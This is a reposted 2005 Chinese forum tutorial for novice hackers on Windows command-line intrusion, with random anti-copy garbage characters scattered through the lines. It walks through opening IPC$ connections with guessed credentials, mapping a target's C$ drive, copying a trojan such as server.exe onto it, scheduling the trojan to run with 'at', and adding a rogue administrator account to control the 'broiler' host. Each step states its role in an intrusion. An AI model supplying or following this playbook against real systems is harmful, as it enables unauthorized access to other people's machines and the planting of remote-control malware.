[转载]菜鸟的重要阶段. f# [/ j; W! A, n6 D5 ]
信息来源:www.hacker-cn.com! c1 m! J* l) w3 R2 N Y( I& @
大家好 我是新来小编 同时和大家一样也是一个菜鸟 希望和大家能一起成长一起学习 下面呢我来介绍一下 安全知识入门学习
9 c( y$ T/ w. U8 k第一节
" F M9 q6 H! e菜鸟必学的网络命令& u" @! h" V& B, Q1 }( B
要学习网络入侵,首先我们必须学习一些基础的网络命令,我们所谓的基础命令其实也就是WIN 2K,WIN XP系统下的一些DOS命令,这个命令都又CMD.exe来完成
3 P; A, g& ?. C* K: [( }概念部分:
; x6 R/ W! m& h6 d; n(1)2000、XP下的CMD与98的MS-DOS的不同之处:, U/ Z: }: b: D
cmd.exe叫命令提示符他与98下的MS-DOS是不一样的,所以我们不能将他混为一谈,但是我们却可以用CMD.exe来执行很多DOS命令,例如:dir、cd、del等等!
1 y: f6 l G- Y9 M5 O(2)CMD下的内部命令与外部命令的不同:5 y9 {3 l& p. h4 ^& L2 v
CMD下的内部命令就是指:我们可以直接在CMD下就可以执行的命令,例如:telnet、ftp、dir、cd、等等,你可以在CMD下输入help进行查看,外部命令呢,就是cmd下不能直接运行的命令,(例如大家常用的nc)他需要在CMD下切换到他(NC)做在的目录你才能运行NC及NC的命令 $ K* k. g* e; z* J5 ]7 |: B
实操部分:
1 O% ^) L8 V# ?0 b5 |. |- U(一):常用入侵防护命令:
: `- b, M" x+ F" {Net 、telnet 、at、copy、ftp、finger、del~~~~~~
3 D9 P5 O0 X( r: V8 ^+ _一些常用的Net命令与例子:1 P; G" ^! A$ k' E# y, Y4 f
(1)建立IPC连接的命令 0 M) c, f" I1 x6 l- y$ M4 R+ B5 t
Net use //IP/ipc$ “” /user:username5 S1 E% R: Z: o. l9 a1 X+ }7 n4 ]* m" @
例如:- K5 ^; g G/ b7 X9 D4 J/ p
Net use //127.0.0.1/ipc$ 123456 /user :administrator
. E* J$ }' e, D3 H! h这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接* ?5 w/ `' y; \* |2 h
(2) 删除IPC$空连接5 e. u6 c. Y1 Y7 f& I# a" Z
Net use //ip /del0 X4 o- n H4 F0 F' B) S) w
例如:
) |4 s' c& ]7 Y2 j+ A: q3 c$ pNet use //127.0.0.1 /del; i! J1 {- c# ~
删除与主机127.0.0.1已经建立的Ipc$连接& F2 P8 y# `& l: B
(3) 启动关闭服务:1 m t( q* n7 t
Net start //查看已经开启的服务* n9 T B# z. d7 q& u9 J6 n
Net start servername* a$ C- j5 {/ ^0 K0 W
Net stop servername {" S( T( M3 J4 H3 O; p
例如:! P4 s4 K! `' n2 A( |
Net start telnet //开启telnet服务" e; u1 e" R3 b3 Z$ I5 x+ {: x3 m
Net stop telnet //关闭telnet服务
8 y; Q: l* e0 d(4)启动关闭共享$ w; `) v' ?/ w$ K2 E+ f$ w# p9 H
Net shate ipc$Content$nbsp; //开启ipc$默认共享1 U% H: {/ Z% B; E7 @, ? q
Net share ipc$ /del //关闭ipc$默认共享* g0 B4 y* Y! K$ D: j
Net share c=c:/ //完全共享c盘
; d3 D: S7 J9 Y8 bNet share d=d:/ //删除完全共享的d盘
0 z' y0 c" Z4 i; H(4) 映射硬盘
7 i. L! C* k% c6 A( b! RNet use z: //ip/c$
; E1 N x% I7 ]; P* v _6 k: @+ ?8 `例如:% p! w+ v9 |9 T6 ~! l( w
Net use z: //127.0.0.1/c$Content$nbsp; //把127.0.0.1的C盘映射成本机的z盘
( t7 a- u4 |" ^7 T+ K说明:映射成功后,你在我的电脑里面里面就会多出一个硬盘Z,其实Z就是127.0.0.1的C盘!
. p' D) V# [* z d5 F: |3 Y6 uNet use z: /del //断开映射1 s4 } @! h( u& a, ^5 d6 Q1 I6 `
入侵中的作用:把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了* k7 N' L, L% u- _
成功实现的条件:必须与对方建立ipc$连接
" X$ U4 M: T- u0 M0 l% h" p1 \/ D(5) 远程复制文件_Copy& Y+ b: b+ m1 ?; }) X
Copy e:/3389.exe //127.0.0.1/c$Content$nbsp; //将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下+ A% Y9 t8 E$ O7 {- a4 [
Copy在入侵中的作用:把本地文件复制到对方硬盘) |" v* [: l( |: O' S& M( Z
Copy复制成功所需的条件:必须与主机建立ipc$连接
9 m5 c% {% k6 h$ f(6) 查看远程系统的时间: L% p7 l2 V5 K
Net time //IP( Q; _. t; |# v( J/ u1 }. h' j
Net time //127.0.0.1 //查看远程主机127.0.0.1的本地时间
9 e3 X1 j9 |5 _9 J8 z% j8 @+ C 作用:得到对方时间好为自己计划任务种下木马做准备: e! I+ `: {+ K2 Q; s/ P, I
(7) 远程运行程序! H0 T! E+ R$ _/ r7 b
At //ip time server.exe
& O$ D# _4 S5 f At //127.0.0.1 12:30 c:/server.exe //让主机在中午12:30分运行我们已经复制到他C
0 w( ]; V; U+ Z0 O# j/ H' ~3 G盘根目录下的木马server.exe
; `) ^3 H1 Z- |( w, N; c在入侵中作用:这样我们就可以用我们的木马服务端来连接我们木马,,更好的使用图形方式来控制肉鸡
) O9 k3 P2 q4 q, R0 t5 T# K$ U(8)添加管理员帐号:1 `4 ~: u9 Z1 u2 q, s, P
Net user username 1234 /add //添加一个密码为1234名字为 username的用户
& A' B& x' B1 a, {; N' u; y Net localgroup administrators juntuan /add //把username这个用户添加到管 理员组
& G% d6 p9 L! y& K8 e7 i5 s 注意:有些系统的管理员组不是administrators你要根据实际情况来改,不过99.9%的系统的管理员组还是administrators的。( [1 }1 H1 x8 H+ A+ N; ]2 _
修改用户密码:
. i: p9 O+ p+ O# D1 w/ p4 `% y Net user username 1234 //把用户username的密码修改成1233。5 O: T! C5 ~, p( f* f( {
(9)远程登陆主机_telnet. U7 U3 v7 T5 g2 b3 s
telnet IP port
) p: Z2 F0 E# i# x! x 例如:telnet 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口5 ^) q' Y3 G- x4 h
(当目标主机的端口是默认的23的时候我们不需要+端口即:telnet IP 就好)
- ~/ z, L$ ?+ [ _' t! c1 l(10)传输文件命令_ftp
2 T M, Z2 f5 b- W9 W: w8 A( X 其实这个我个人觉得用途不大,毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢?+ r3 k& a$ y! z+ f
首先在CMD里面输入ftp* v7 M8 j6 E$ w3 v. y
然后输入:open IP port! \- @/ \ u: \4 J: ^
例如:open 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口
( O0 |9 o8 {* E" a+ C2 T* C 如何开启windows系统自带的ftp服务:
$ t$ n1 R- l+ n1 Y Net start msftppsvc1 a5 b" m' J! f/ Z
(11) 查看文件夹的属性_cacls
& l$ C# F0 t8 u6 a1 a* f3 T: CCacls xiaod //查看xiaod这个文件夹的属性( k# v% q0 M) A( r* @
参数说明:F:(完全控制)R:(只读)C:(允许更改)W:(允许写入)N:(没有任何权限)
% C4 ~$ L7 ^& a# s. J(12) 删除文件_del
% m; [- e, A w- P# m. f& xDel是用来删除文件命令
; B2 D( g5 h ?: A 首先进入你想删除的文件的目录
/ j, b8 C! E5 u Del xiaod.txt //删除xiaod.txt这个个文件
8 p1 A2 M, j! b1 K: t Del xiaod.txt /f //强制删除xiaod.txt这个个文件(当该文件无法正常删除的时候使用该命令)+ @( R4 t; E. l- C; B
(13) finger命令
9 \. Q7 q" j7 ]( r$ K) A- [ Finger是一个信息刺探命令一般在对方开启了79端口时命令使用& F2 b# \8 r, ]/ q0 z
Finger –l user @computer' Q N. h) a6 c
参数详解: -l 用长列表格式显示消息
2 Y w6 `1 N3 s( F) J User:指定用户的信息
! ?* q! e7 j& y3 R9 B 成功实现的条件:对方必须安装tcp/ip协议8 Z! R; U! C; L& E t. r
(14):文件写入命令_echo:
) v" J, z d0 ]+ y% ~ Q0 L9 cEcho 你好 > index.htm //用你好来覆盖index.htm的内容
7 I& g. ?5 f/ c7 T1 I" I, xEcho 你好 >>index.htm //将“你好”添加到index.htm5 O% W, F X+ Y7 i. l' i2 j# D6 V
(15):写入注册表文件_regedit
" h* V- j6 y' E( k+ R Regedit /s filename.reg //s是写入参数1 d) z1 ?- }% y+ l6 U" G8 x4 S
(16):端口映射_chgport
4 s6 ^5 D5 Q# l Chgport 3=5 //将端口3映射到5" V. c/ q" r: E/ A
Chgport /d* //删除所有端口映射
, }: {+ @8 H6 r& p1 A( C/ S(17):文件映射_subst
' [& x2 h' I2 w$ m8 \, |) K0 Q* D* a Subst b:/ c:/winnt //这个时候当你访问硬盘B的时候你就是访问了 c:/winnt目录
5 | B& I- k7 t7 l(18):查看当前正在使用的帐号:" z' a% B& Z. Z' X" J) B
Query session //查看帐号- B; A3 V& R! j# a
(19):踢掉指定用:
! f) n) |$ v% t Logoff id //注意ID,是在用query session查看到的用户的id而不是用户名。0 r5 M9 ]: \( R0 R
(20):发送消息给某用户或者内网主机. b0 e. t' u- U) s5 M3 B6 M) z: o
Net send hostname or /IP message
4 t! I. }# K9 r- A4 W, z 例如:net send xiaod or /127.0.0.1 hello! |
/1 
粤公网安备44152102000001号 
发表于 2005-8-10 12:07:32